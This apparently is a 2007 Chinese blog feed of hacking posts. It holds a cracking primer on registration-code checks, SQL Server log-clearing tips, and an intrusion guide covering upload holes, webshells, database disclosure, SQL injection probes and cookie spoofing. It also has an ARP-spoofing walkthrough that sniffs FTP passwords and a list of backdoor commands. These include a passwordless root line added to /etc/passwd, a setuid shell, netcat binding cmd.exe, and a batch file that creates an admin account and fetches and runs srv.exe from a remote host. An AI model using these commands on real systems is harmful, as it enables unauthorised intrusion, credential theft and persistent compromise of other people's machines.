<p>即Application Programming Interface的简写，中文叫应用<a href="http://www.nohack.cn/code/" target=_blank>程序</a>编程接口，是一个系统定义函数的大集合，它提供了访问操作系统特征的方法。 API包含了几百个应用<a href="http://www.nohack.cn/code/" target=_blank>程序</a>调用的函数，这些函数执行所有必须的与操作系统相关的操作，如内存分配、向屏幕输出和创建窗口等，用户的<a href="http://www.nohack.cn/code/" target=_blank>程序</a>通过调用API接口同WINDOWS打交道，无论什么样的应用<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，其底层最终都是通过调用各种API函数来实现各种功能的。通常API有两中基本形式：Win16和Win32。 Win16是原来的、API的16位版本，用于Windows 3.1；Win32是现在的、API的32位版本，用于Windows 95/98/NT/ME/2000。Win32包括了Win16，是Win16的超集，大多数函数的名字、用法都是相同的。16位的API函数和32位的 API函数的区别在于最后的一个字母，例如我们设置这样的断点：bpx GetDlgItemText、bpx GetDlgItemTextA和bpx GetDlgItemTextW，其中 GetDlgItemText是16位API函数，GetDlgItemTextA和GetDlgItemTextW是32位API函数，而 GetDlgItemTextA表示函数使用单字节，GetDlgItemTextW表示函数使用双字节。现在我们破解中常用到的是Win32单字节 API函数，就是和GetDlgItemTextA类似的函数，其它的两种（Win16 API和Win32双字节API函数）则比较少见。 Win32 API函数包含在动态链接库（Dynamic Link Libraries，简称DLLs）中，即包含在kernel32.dll、user32.dll、gdi32.dll和comctl32.dll中，这就是为什么我们要在softice中用exp=C:/windows/system/kernel32.dll等命令行将这些动态链接库导入 softice中的原因。因为不这样做的话，我们就无法拦截到系统Win32 API函数调用了。 </p>
<p>4. 关于<a href="http://www.nohack.cn/code/" target=_blank>程序</a>中注册码的存在方式： </p>
<p>破解过程中我们都会去找<a href="http://www.nohack.cn/code/" target=_blank>程序</a>中将输入的注册码和正确的注册码相比较的地方，然后通过对<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的跟踪、分析找到正确的注册码。但是正确的注册码通常在<a href="http://www.nohack.cn/code/" target=_blank>程序</a>中以两种形态存在：显式的和隐式的，对于显式存在的注册码，我们可以直接在<a href="http://www.nohack.cn/code/" target=_blank>程序</a>所处的内存中看到它，例如你可以直接在SOFTICE的数据窗口中看到类似"297500523"这样存在的注册码（这里是随意写的），对于注册码显式存在的软件破解起来比较容易；但是有些软件的<a href="http://www.nohack.cn/code/" target=_blank>程序</a>中并不会直接将我们输入的注册码和正确的注册码进行比较，比如有可能将注册码换算成整数、或是将注册码拆开，然后将每一位注册码分开在不同的地方逐一进行比较，或者是将我们输入的注册码进行某种变换，再用某个特殊的<a href="http://www.nohack.cn/code/" target=_blank>程序</a>进行验证等等。总之，应用<a href="http://www.nohack.cn/code/" target=_blank>程序</a>会采取各种不同的复杂运算方式来回避直接的注册码比较，对于这类<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，我们通常要下功夫去仔细跟踪、分析每个<a href="http://www.nohack.cn/code/" target=_blank>程序</a>功能，找到加密算法，然后才能破解它，当然这需要一定的8086汇编编程功底和很大的耐心与精力。 </p>
<p>5. 关于软件的破解方式： </p>
<p>本人将破解方式分为两大类，即完全破解和暴力破解。所谓完全破解主要是针对那些需要输入注册码或密码等软件来说的，如果我们能通过对<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的跟踪找到正确的注册码，通过软件本身的注册功能正常注册了软件，这样的破解称之为完全破解；但如果有些软件本身没有提供注册功能，只是提供试用（DEMO），或是注册不能通过软件本身进行（例如需要获取另外一个专用的注册<a href="http://www.nohack.cn/code/" target=_blank>程序</a>，通过INTERNET的注册等等），或者是软件本身的加密<a href="http://www.nohack.cn/" target=_blank>技术</a>比较复杂，软件破解者的能力、精力、时间有限，不能直接得到正确的注册码，此时我们需要去修改软件本身的<a href="http://www.nohack.cn/code/" target=_blank>程序</a>码。 </p>
<p>6. 关于破解<a href="http://www.nohack.cn/books/" target=_blank>教程</a>中<a href="http://www.nohack.cn/code/" target=_blank>程序</a>代码地址问题： </p>
<p>破解<a href="http://www.nohack.cn/books/" target=_blank>教程</a>中都会放上一部分<a href="http://www.nohack.cn/code/" target=_blank>程序</a>代码以帮助讲解<a href="http://www.nohack.cn/code/" target=_blank>程序</a>的分析方法，例如下面的一段<a href="http://www.nohack.cn/code/" target=_blank>程序</a>代码： </p>
<p><br>...... <br>0167:00408033　PUSH　00 <br>0167:00408035　PUSH　EBX <br>0167:00408036　CALL　[USER32!EndDialog] <br>0167:0040803C　JMP　0040812C <br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ......<br>&nbsp;</p>
<p>在这里<a href="http://www.nohack.cn/code/" target=_blank>程序</a>中的代码地址如0167:00408033，其代码段的值（即0167）有可能根据不同的<a href="http://www.nohack.cn/" target=_blank>电脑</a>会有区别，不一定一模一样，但偏移值应该是固定的（即00408033不变），所以如果看到破解文章里的<a href="http://www.nohack.cn/code/" target=_blank>程序</a>代码的地址值和自己的<a href="http://www.nohack.cn/" target=_blank>电脑</a>里不一样，不要以为搞错地方了，只要你的<a href="http://www.nohack.cn/code/" target=_blank>程序</a>代码正确就不会有问题。 </p>
<img src ="http://www.cnitblog.com/yiye/aggbug/27317.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yiye/" target="_blank">yiye</a> 2007-05-20 14:06 <a href="http://www.cnitblog.com/yiye/archive/2007/05/20/27317.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>教你如何清除SQL日志</title><link>http://www.cnitblog.com/yiye/archive/2007/05/20/27318.html</link><dc:creator>yiye</dc:creator><author>yiye</author><pubDate>Sun, 20 May 2007 06:06:00 GMT</pubDate><guid>http://www.cnitblog.com/yiye/archive/2007/05/20/27318.html</guid><wfw:comment>http://www.cnitblog.com/yiye/comments/27318.html</wfw:comment><comments>http://www.cnitblog.com/yiye/archive/2007/05/20/27318.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yiye/comments/commentRss/27318.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yiye/services/trackbacks/27318.html</trackback:ping><description><![CDATA[<font size=+0><font id=Zoom>aspContentLabel style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px"&gt;
<p>1．打开查询分析器，输入命令<br>DUMP TRANSACTION <a href="http://www.nohack.cn/code/sql/" target=_blank>数据库</a>名 WITH NO_LOG<br>2.再打开企业管理器--右键你要压缩的<a href="http://www.nohack.cn/code/sql/" target=_blank>数据库</a>--所有任务--收缩<a href="http://www.nohack.cn/code/sql/" target=_blank>数据库</a>--收缩文件--选择日志文件--在收缩方式里选择收缩至XXM,这里会给出一个允许收缩到的最小M数,直接输入这个数,确定就可以了。<br><br>清除Log有两种方法：<br><br>　　1.自动清除法<br><br>　　开放<a href="http://www.nohack.cn/code/sql/" target=_blank>数据库</a>选项 Trunc Log on Chkpt，使<a href="http://www.nohack.cn/code/sql/" target=_blank>数据库</a>系统每隔一段时间自动清除Log。此方法的优点是无须人工干预，由SQL　Server自动执行，并且一般不会出现Log溢满的情况；缺点是只清除Log而不做备份。<br><br>　　2.手动清除法<br><br>　　执行命令&#8220;dump transaction&#8221;来清除Log。以下两条命令都可以清除日志：<br><br>dump transaction with truncate_only<br>dump transaction with no_log <br><br>通常删除事务日志中不活跃的部分可使用&#8220;dump transaction with trancate_only&#8221;命令，这条命令写进事务日志时，还要做必要的并发性检查。SYBASE提供&#8220;dump transaction with no_log&#8221;来处理某些非常紧迫的情况，使用这条命令有很大的危险性，SQL　Server会弹出一条警告信息。为了尽量确保<a href="http://www.nohack.cn/code/sql/" target=_blank>数据库</a>的一致性，你应将它作为&#8220;最后一招&#8221;。<br><br>　　以上两种方法只??清除日志，而不做日志备份，若想备份日志，应执行&#8220;dump transaction database_name to dumpdevice&#8221;命令。 </p>
<p>PS:附一个更好的方法</p>
<p>先分离<a href="http://www.nohack.cn/code/sql/" target=_blank>数据库</a>后，直接删除日志以后,再在查询分析器里用</p>
<p>exec sp_attach_single_file_db '<a href="http://www.nohack.cn/code/sql/" target=_blank>数据库</a>名', '.mdf文件路径' <br>命令附加<a href="http://www.nohack.cn/code/sql/" target=_blank>数据库</a>。 OVER.在别的地方看到的 不错。</p>
</font></font>
<img src ="http://www.cnitblog.com/yiye/aggbug/27318.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yiye/" target="_blank">yiye</a> 2007-05-20 14:06 <a href="http://www.cnitblog.com/yiye/archive/2007/05/20/27318.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>黑客新人必学的网站入侵基本知识</title><link>http://www.cnitblog.com/yiye/archive/2007/05/20/27315.html</link><dc:creator>yiye</dc:creator><author>yiye</author><pubDate>Sun, 20 May 2007 06:04:00 GMT</pubDate><guid>http://www.cnitblog.com/yiye/archive/2007/05/20/27315.html</guid><wfw:comment>http://www.cnitblog.com/yiye/comments/27315.html</wfw:comment><comments>http://www.cnitblog.com/yiye/archive/2007/05/20/27315.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yiye/comments/commentRss/27315.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yiye/services/trackbacks/27315.html</trackback:ping><description><![CDATA[<font id=Zoom>因为我是刚来，所以就从新的开始，也好让刚来的朋友从头开始!首先介绍下什么样的站点可以入侵:必须是动态的<a href="http://www.nohack.cn/" target=_blank>网站</a>，比如<a href="http://www.nohack.cn/code/asp/" target=_blank>asp</a>、<a href="http://www.nohack.cn/code/php/" target=_blank>php</a>、<a href="http://www.nohack.cn/code/jsp/" target=_blank>jsp</a> 这种形式的站点。后缀为.htm的站点劝大家还是不要入侵了吧(入侵几率几乎为0) </font>
<p><font id=Zoom>　　1 上传<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>，这个<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>在DVBBS6.0时代被<a href="http://www.nohack.cn/" target=_blank>黑客</a>们利用的最为猖獗，利用上传<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>可以直接得到WEBSHELL，危害等级超级高，现在的入侵中上传<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>也是常见的<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>。</font></p>
<p><font id=Zoom>　　怎样利用:在<a href="http://www.nohack.cn/" target=_blank>网站</a>的地址栏中网址后加上/upfile.<a href="http://www.nohack.cn/code/asp/" target=_blank>asp</a>如果显示 上传格式不正确[重新上传] 这样的字样8成就是有长传<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>了找个可以上传的工具直接可以得到WEBSHELL。</font></p>
<p><font id=Zoom>　　工具介绍:上传工具，老兵的上传工具、DOMAIN3.5，这两个软件都可以达到上传的目的，用NC也可以提交。</font></p>
<p><font id=Zoom>　　WEBSHELL是什么:WEBSHELL在上节课简单的介绍了下，许多人都不理解，这里就详细讲下，其实 WEBSHELL并不什么深奥的东西，是个WEB的权限，可以管理WEB，修改主页内容等权限，但是并没有什么特别高的权限，(这个看管理员的设置了)一般修改别人主页大多都需要这个权限，接触过WEB<a href="http://www.nohack.cn/" target=_blank>木马</a>的朋友可能知道(比如老兵的站长助手就是WEB<a href="http://www.nohack.cn/" target=_blank>木马</a> 海阳2006也是 WEB<a href="http://www.nohack.cn/" target=_blank>木马</a>)我们上传<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>最终传的就是这个东西，有时碰到权限设置不好的服务器可以通过WEBSHELL得到最高权限。</font></p>
<p><font id=Zoom>　　2 暴库:这个<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>现在很少见了，但是还有许多站点有这个<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>可以利用，暴库就是提交字符得到<a href="http://www.nohack.cn/code/sql/" target=_blank>数据库</a>文件，得到了<a href="http://www.nohack.cn/code/sql/" target=_blank>数据库</a>文件我们就直接有了站点的前台或者后台的权限了。</font></p>
<p><font id=Zoom>　　暴库方法:比如一个站的地址为 <a href="http://www.xxx.com/dispbbs.%3Ca%20href=%27http://www.nohack.cn/code/asp/%27%20target=_blank%3Easp%3C/a%3E?boardID=7&amp;ID=161"><u><font color=#0000ff>http://www.xxx.com/dispbbs.</font></u></a><u><font color=#0000ff><a href="http://www.nohack.cn/code/asp/" target=_blank>asp</a>?boardID=7&amp;ID=161</font></u>，我门就可以把com/dispbbs中间的/换成%5c，如果有<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>直接得到<a href="http://www.nohack.cn/code/sql/" target=_blank>数据库</a>的绝对路径，用寻雷什么的下载下来就可以了。还有种方法就是利用默认的<a href="http://www.nohack.cn/code/sql/" target=_blank>数据库</a>路径<a href="http://www.xxx.com/"><u><font color=#0000ff>http://www.xxx.com/</font></u>后面加上conn.</a><a href="http://www.nohack.cn/code/asp/" target=_blank>asp</a>。如果没有修改默认的<a href="http://www.nohack.cn/code/sql/" target=_blank>数据库</a>路径也可以得到<a href="http://www.nohack.cn/code/sql/" target=_blank>数据库</a>的路径(注意:这里的/也要换成%5c)。</font></p>
<p><font id=Zoom>　　为什么换成%5c:因为在ASCII码里/等于%5c，有时碰到<a href="http://www.nohack.cn/code/sql/" target=_blank>数据库</a>名字为/#abc.mdb的为什么下不了? 这里需要把#号换成%23就可以下载了，为什么我暴出的<a href="http://www.nohack.cn/code/sql/" target=_blank>数据库</a>文件是以。ASP结尾的?我该怎么办?这里可以在下载时把.ASP换成.MDB 这样就可以下载了如果还下载不了可能作了防下载。</font></p>
<p><font id=Zoom>　　3 注入<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>:这个<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>是现在应用最广泛，杀伤力也很大的<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>，可以说微软的官方<a href="http://www.nohack.cn/" target=_blank>网站</a>也存在着注入<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>。注入<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>是因为字符过滤不严禁所造成的，可以得到管理员的帐号密码等相关资料。</font></p>
<p><font id=Zoom>　　怎样利用:我先介绍下怎样找<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>比如这个网址 <a href="http://www.xxx.com/dispbbs.%3Ca%20href=%27http://www.nohack.cn/code/asp/%27%20target=_blank%3Easp%3C/a%3E?boardID=7&amp;ID=161"><u><font color=#0000ff>http://www.xxx.com/dispbbs.</font></u></a><u><font color=#0000ff><a href="http://www.nohack.cn/code/asp/" target=_blank>asp</a>?boardID=7&amp;ID=161</font></u> 后面是以ID=数字形式结尾的站我们可以手动在后面加上个 and 1=1 看看 如果显示正常页面 再加上个and 1=2 来看看 如果返回正常页面说明没有<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a> 如果返回错误页面说明存在注入<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>。如果加and 1=1 返回错误页面说明也没有<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>，知道了站点有没有<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>我门就可以利用了 可以手工来猜解也可以用工具现在工具比较多(NBSI NDSI 啊D DOMAIN等)都可以用来猜解帐号密码，因为是菜鸟接触，我还是建议大家用工具，手工比较烦琐。</font></p>
<p><font id=Zoom>　　4 旁注:我们入侵某站时可能这个站坚固的无懈可击，我们可以找下和这个站同一服务器的站点，然后在利用这个站点用提权，嗅探等方法来入侵我们要入侵的站点。打个形象的比喻，比如你和我一个楼，我家很<a href="http://www.nohack.cn/" target=_blank>安全</a>，而你家呢，却<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a>百出，现在有个贼想入侵我家，他对我家做了监视(也就是扫描)发现没有什么可以利用的东西，那么这个贼发现你家和我家一个楼，你家很容易就进去了，他可以先进入你家，然后通过你家得到整个楼的钥匙(系统权限)，这样就自然得到我的钥匙了，就可以进入我的家(<a href="http://www.nohack.cn/" target=_blank>网站</a>)。</font></p>
<p><font id=Zoom>　　工具介绍:还是名小子的DOMIAN3.5不错的东西，可以检测注入，可以旁注，还可以上传!</font></p>
<p><font id=Zoom>　　5 COOKIE诈骗:许多人不知道什么是COOKIE，COOKIE是你上网时由<a href="http://www.nohack.cn/" target=_blank>网站</a>所为你发送的值记录了你的一些资料，比如IP，姓名什么的。</font></p>
<p><font id=Zoom>　　怎样诈骗呢?如果我们现在已经知道了XX站管理员的站号和MD5密码了，但是破解不出来密码(MD5是加密后的一个16位的密码)我们就可以用COOKIE诈骗来实现，把自己的ID修改成管理员的，MD5密码也修改成他的，有工具可以修改COOKIE 这样就答到了COOKIE诈骗的目的，系统以为你就是管理员了。</font></p>
<img src ="http://www.cnitblog.com/yiye/aggbug/27315.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yiye/" target="_blank">yiye</a> 2007-05-20 14:04 <a href="http://www.cnitblog.com/yiye/archive/2007/05/20/27315.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>ARP监听渗透内网的方法</title><link>http://www.cnitblog.com/yiye/archive/2007/05/20/27316.html</link><dc:creator>yiye</dc:creator><author>yiye</author><pubDate>Sun, 20 May 2007 06:04:00 GMT</pubDate><guid>http://www.cnitblog.com/yiye/archive/2007/05/20/27316.html</guid><wfw:comment>http://www.cnitblog.com/yiye/comments/27316.html</wfw:comment><comments>http://www.cnitblog.com/yiye/archive/2007/05/20/27316.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yiye/comments/commentRss/27316.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yiye/services/trackbacks/27316.html</trackback:ping><description><![CDATA[<p>假设想<a href="http://www.nohack.cn/" target=_blank>攻击</a>的主机IP是:61.139.1.79 ,同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆 </p>
<p>第一步: <br>tracert 61.139.1.1 </p>
<p>C:/WIN2000/system32&gt;tracert 61.139.1.1 </p>
<p>Tracing route to HACK-4FJ7EARC [61.139.1.1] <br>over a maximum of 30 hops: </p>
<p>1 &lt;10 ms &lt;10 ms &lt;10 ms HACK-4FJ7EARC [61.139.1.1] </p>
<p>Trace complete. </p>
<p>这就说明了你想<a href="http://www.nohack.cn/" target=_blank>攻击</a>的主机和你所在的主机在一个关网中那么就有可能 <br>进行ARPSNIFFER了 </p>
<p>第二步:看本机IP设置和网卡情况 <br>C:/WIN2000/system32&gt;ipconfig /all </p>
<p>Windows 2000 IP Configuration </p>
<p>Host Name . . . . . . . . . . . . : smscomputer <br>Primary DNS Suffix . . . . . . . : <br>Node Type . . . . . . . . . . . . : Broadcast <br>IP Routing Enabled. . . . . . . . : No <br>WINS Proxy Enabled. . . . . . . . : No </p>
<p>Ethernet adapter Intel Fast Ethernet LAN Controller - onboard: </p>
<p>Connection-specific DNS Suffix . : <br>Description . . . . . . . . . . . : Intel(R) 8255x Based Network Connection <br>Physical Address. . . . . . . . . : 00-B0-D0-22-10-C6 <br>DHCP Enabled. . . . . . . . . . . : No <br>IP Address. . . . . . . . . . . . : 61.139.1.2 <br>Subnet Mask . . . . . . . . . . . : 255.255.255.0 <br>Default Gateway . . . . . . . . . : 61.139.1.65 <br>DNS Servers . . . . . . . . . . . : 61.139.1.73 </p>
<p>说明只有一块网卡那么在执行ARPSNIFFER的时候就可以不要第五个参数了这个地 <br>方小榕的主页可没有说哟,经过测试我发觉如果只有一块网卡你第五个参数使用0 <br>的话也只能嗅探到通过自已的数据哟. <br>从上面我们还可以知道网关是61.139.1.65 </p>
<p>第三步:查看本机时间 <br>C:/WIN2000/system32&gt;net time //127.0.0.1 </p>
<p>//127.0.0.1 的当前时间是 2003/1/28 下午 09:13 </p>
<p>命令完成成功 </p>
<p>要注意的是这儿的时间是12小时式,用at命令应要24小时式 </p>
<p>第四步:编写启动ARPsniffer的bat文件 <br>C:/WIN2000/system32&gt;echo arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset&gt;c:/winnt/a.bat </p>
<p>注意咯我们没有要第五个参数,如果有多个网卡的话你就要先直接执行arpsniffer显示如下: <br>ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB <br>www.netXeyes.com 2002, security@vip.sina.com </p>
<p>Network Adapter 0: D-Link DE-528 Ethernet PCI Adapter <br>Network Adapter 1: Intel(R) PRO/100+ PCI Adapter(这个地方选第五个参数) </p>
<p>Usage: ArpSniffer [/RESET] </p>
<p>第五步:后台运行开始嗅探咯 <br>C:/winnt/system32&gt;at //127.0.0.1 20:44 c:/winnt/a.bat </p>
<p>注意:这儿的时间要用24小时式 <br>arpsniffer最好拷到system32目录下,记录文件也会生成在这儿 <br>执行完第四步要先安装WINPCAP 2.1驱动 <br>同时arpsniffer要使用最新的0.5版,老版本有不少BUG而且要改注册表重启机子 </p>
<p>第六步:看密码但是生成的记录文件不能直接看也不能拷贝所以我们只能先结束掉 <br>以SYSTEM权限启动的ARPSniffer<a href="http://www.nohack.cn/code/" target=_blank>程序</a> <br>C:/winnt/system32&gt;pulist <br>................... <br>conime.exe 248 NT AUTHORITY/SYSTEM <br>explorer.exe 1864 SMSCOMPUTER/Administrator <br>CSRSS.EXE 2256 NT AUTHORITY/SYSTEM <br>Arpsniffer.exe 2322 NT AUTHORITY/SYSTEM ----就是它了! <br>WINLOGON.EXE 2344 NT AUTHORITY/SYSTEM <br>...................... </p>
<p>杀了它 <br>C:/winnt/system32&gt;pskill 2322 <br>PsKill v1.03 - local and remote process killer <br>Copyright (C) 2000 Mark Russinovich <br>http://www.sysinternals.com </p>
<p>Process 2322 killed. </p>
<p>C:/winnt/system32&gt;type 1.txt 我的例子中嗅探的是FTP密码:) </p>
<p>............... <br>61.188.218.179(1404)-&gt;61.139.1.79(21)PASS aaabbb <br>61.139.1.79(21)-&gt;61.188.218.179(1404)530 User czy82 cannot log in. <br>61.139.1.79(21)-&gt;61.188.218.179(1404)530 User czy82 cannot log in. <br>61.188.218.179(1404)-&gt;61.139.1.79(21)QUIT <br>61.188.218.179(1404)-&gt;61.139.1.79(21)QUIT <br>61.139.1.79(21)-&gt;61.188.218.179(1404)221 <br>61.139.1.79(21)-&gt;61.188.218.179(1404)221 <br>............ <br>............ </p>
<p>特别要注意的就是PASS哈:) </p>
<p>---------------------------------------------------- <br>付录: <br>前台正常执行的显示 </p>
<p>C:/&gt;arpsniffer 61.139.1.65 61.139.1.79 21 1.txt /reset </p>
<p>ARPSniffer 0.5 (Router Inside), by netXeyes, Special Thanks BB <br>www.netXeyes.com 2002, security@vip.sina.com </p>
<p>Network Adapter 0: Intel(R) 8255x Based Network Connection </p>
<p>Enable IP Router....OK </p>
<p>Get 61.139.1.65 Hardware Address: 00-00-0c-07-ac-02 <br>Get 61.139.1.79 Hardware Address: 00-b0-d0-22-10-cb <br>Get 61.139.1.88 Hardware Address: 00-b0-d0-22-10-c6 </p>
<p>Spoof 61.139.1.79: Mac of 61.139.1.65 ===&gt; Mac of 61.139.1.88 <br>Spoof 61.139.1.65: Mac of 61.139.1.79 ===&gt; Mac of 61.139.1.88 <br>有时这儿要先显示can not open driver(0)不管它等一下就可以了 <br>Begin Sniffer......... </p>
<img src ="http://www.cnitblog.com/yiye/aggbug/27316.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yiye/" target="_blank">yiye</a> 2007-05-20 14:04 <a href="http://www.cnitblog.com/yiye/archive/2007/05/20/27316.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>黑客技巧系列之常见的一些留后门手法</title><link>http://www.cnitblog.com/yiye/archive/2007/05/20/27313.html</link><dc:creator>yiye</dc:creator><author>yiye</author><pubDate>Sun, 20 May 2007 06:02:00 GMT</pubDate><guid>http://www.cnitblog.com/yiye/archive/2007/05/20/27313.html</guid><wfw:comment>http://www.cnitblog.com/yiye/comments/27313.html</wfw:comment><comments>http://www.cnitblog.com/yiye/archive/2007/05/20/27313.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yiye/comments/commentRss/27313.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yiye/services/trackbacks/27313.html</trackback:ping><description><![CDATA[<font size=+0><font id=Zoom>aspContentLabel style="PADDING-RIGHT: 10px; DISPLAY: block; PADDING-LEFT: 10px; PADDING-BOTTOM: 0px; PADDING-TOP: 0px"&gt;<font id=font_word style="FONT-SIZE: 14px; FONT-FAMILY: 宋体,Verdana,Arial,Helvetica,sans-serif">
<p style="TEXT-INDENT: 2em">对于我们这样的菜手，好不容易搞了台<nobr>服务</nobr>器很不容易，如果被发现了就惨了。其实，开后门的方法有很多种，下面我来说说，我以前学习过的几种方法。 </p>
<p style="TEXT-INDENT: 2em"><strong>1. Setuid</strong> </p>
<p style="TEXT-INDENT: 2em"><ccid_nobr></ccid_nobr>
<table cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=#000000 border=1>
    <tbody>
        <tr>
            <td class=code style="FONT-SIZE: 9pt" bgColor=#e6e6e6>
            <p style="TEXT-INDENT: 2em"><ccid_code></ccid_code>#cp /bin/sh /tmp/.root#chmod u+s /tmp/.root</p>
            </td>
        </tr>
    </tbody>
</table>
</p>
<p style="TEXT-INDENT: 2em">加上 suid 位到shell 上，虽然很<nobr>简单</nobr>，但容易被发现。 </p>
<p style="TEXT-INDENT: 2em"><strong>2. Echo "hack::0:0::/:/bin/csh" &gt;&gt; /etc/passwd</strong> </p>
<p style="TEXT-INDENT: 2em">即给系统增加一个 ID 为 0（root)的帐号，无口令，但管理员用find命令就可以发现。 </p>
<p style="TEXT-INDENT: 2em"><strong>3.Echo "+ hack"&gt;&gt;/.rhosts</strong> </p>
<p style="TEXT-INDENT: 2em">如果这个系统开了512、513的port，就可以。把一个名为hack加到.rhosts文件中，rlogin登陆，无须密码。 </p>
<p style="TEXT-INDENT: 2em"><strong>4.修改 Sendmail.cf文件</strong> </p>
<p style="TEXT-INDENT: 2em">增加一个"wiz" 命令，然后telnet www.xxx.com 25后，wiz，这就可以了。 </p>
<p style="TEXT-INDENT: 2em"><strong>5. Rootkit backdoor</strong> </p>
<p style="TEXT-INDENT: 2em">这些东西现在是很火热的东西，但小心该后的文件的适用性、日期等等一些小的细节。有的需要自己编译，有的是编译好的。 </p>
<p style="TEXT-INDENT: 2em"><strong>6.Remote shell</strong> </p>
<p style="TEXT-INDENT: 2em">Sunx的那个backdoor就很不错，不会产生日记文件，防止who等等。需要编译，但运行在redhat 6.1很不错。但在7.1等版本中好象就有点bug。 </p>
<p style="TEXT-INDENT: 2em">或者可以bindshell，可以替换inetd.conf中不常用的服务，注意文件的修改时间。 </p>
<p style="TEXT-INDENT: 2em"><strong>7. Http后门</strong> </p>
<p style="TEXT-INDENT: 2em">其实，一般的<nobr>防火墙</nobr>对Web服务的限制少的很，所以我们可以从这里入手，这里需要用到端口重定向。简单的说就是web开的http服务有2个，一个是http本身，一个是remote shell bindshell。防火墙过滤其他一切port，禁止反向连接，简单的就是可以用nc。（netcat这个）把cmd.exe绑定到80端口上去。 telnet www.xxx.com 80 然后就得到一个shell。或者可以利用<a href="http://www.nohack.cn/code/asp/" target=_blank>asp</a>,<a href="http://www.nohack.cn/code/php/" target=_blank>php</a>.cgi等代码写的后门，也可以作到相同的效果。 </p>
<p style="TEXT-INDENT: 2em"><strong>8.Bat后门（原创）</strong> </p>
<p style="TEXT-INDENT: 2em">如果是xnix服务器，没办法。 </p>
<p style="TEXT-INDENT: 2em">Ms服务器： </p>
<p style="TEXT-INDENT: 2em"><ccid_nobr></ccid_nobr>
<table cellSpacing=0 borderColorDark=#ffffff cellPadding=2 width=400 align=center borderColorLight=#000000 border=1>
    <tbody>
        <tr>
            <td class=code style="FONT-SIZE: 9pt" bgColor=#e6e6e6>
            <p style="TEXT-INDENT: 2em"><ccid_code></ccid_code>backdoor.bat </p>
            <p style="TEXT-INDENT: 2em">net user hacker windychild /add </p>
            <p style="TEXT-INDENT: 2em">net localgroup administrators hacker /add ...create super admin user </p>
            <p style="TEXT-INDENT: 2em">echo open www.xxx.com&gt;c:ftp.txt </p>
            <p style="TEXT-INDENT: 2em">echo xxx&gt;&gt;c:/ftp.txtecho xxxxxx&gt;&gt;c:/ftp.txt </p>
            <p style="TEXT-INDENT: 2em">echo get srv.exe&gt;&gt;c:/ftp.txt </p>
            <p style="TEXT-INDENT: 2em">echo bye&gt;&gt;c:/ftp.txt </p>
            <p style="TEXT-INDENT: 2em">ftp -s:c:/ftp.txt </p>
            <p style="TEXT-INDENT: 2em">copy srv.exe c:/winnt/ </p>
            <p style="TEXT-INDENT: 2em">c:/winnt/srv.exe </p>
            <p style="TEXT-INDENT: 2em">del c:/ftp.txt </p>
            <p style="TEXT-INDENT: 2em">del c:/srv.exe ......可以自己设置<nobr><a href="http://www.nohack.cn/" target=_blank>木马</a></nobr>或后门等....或你可以写上开启3389服务，telnet的语句其他，开放共享服务！ </p>
            <p style="TEXT-INDENT: 2em">net share ipc=ipc$ </p>
            <p style="TEXT-INDENT: 2em">net share hdc=c$......</p>
            </td>
        </tr>
    </tbody>
</table>
</p>
<p style="TEXT-INDENT: 2em">如果狠点的话，干脆再给它上个rootkit for win。 </p>
<p style="TEXT-INDENT: 2em"><strong>9.可以利用邮件编码<a href="http://www.nohack.cn/bugs/" target=_blank>漏洞</a></strong> </p>
<p style="TEXT-INDENT: 2em">自己设置一个base64的编码文件发给你的<nobr>朋友</nobr>，然后把后门.exe转换成邮件编码。 </p>
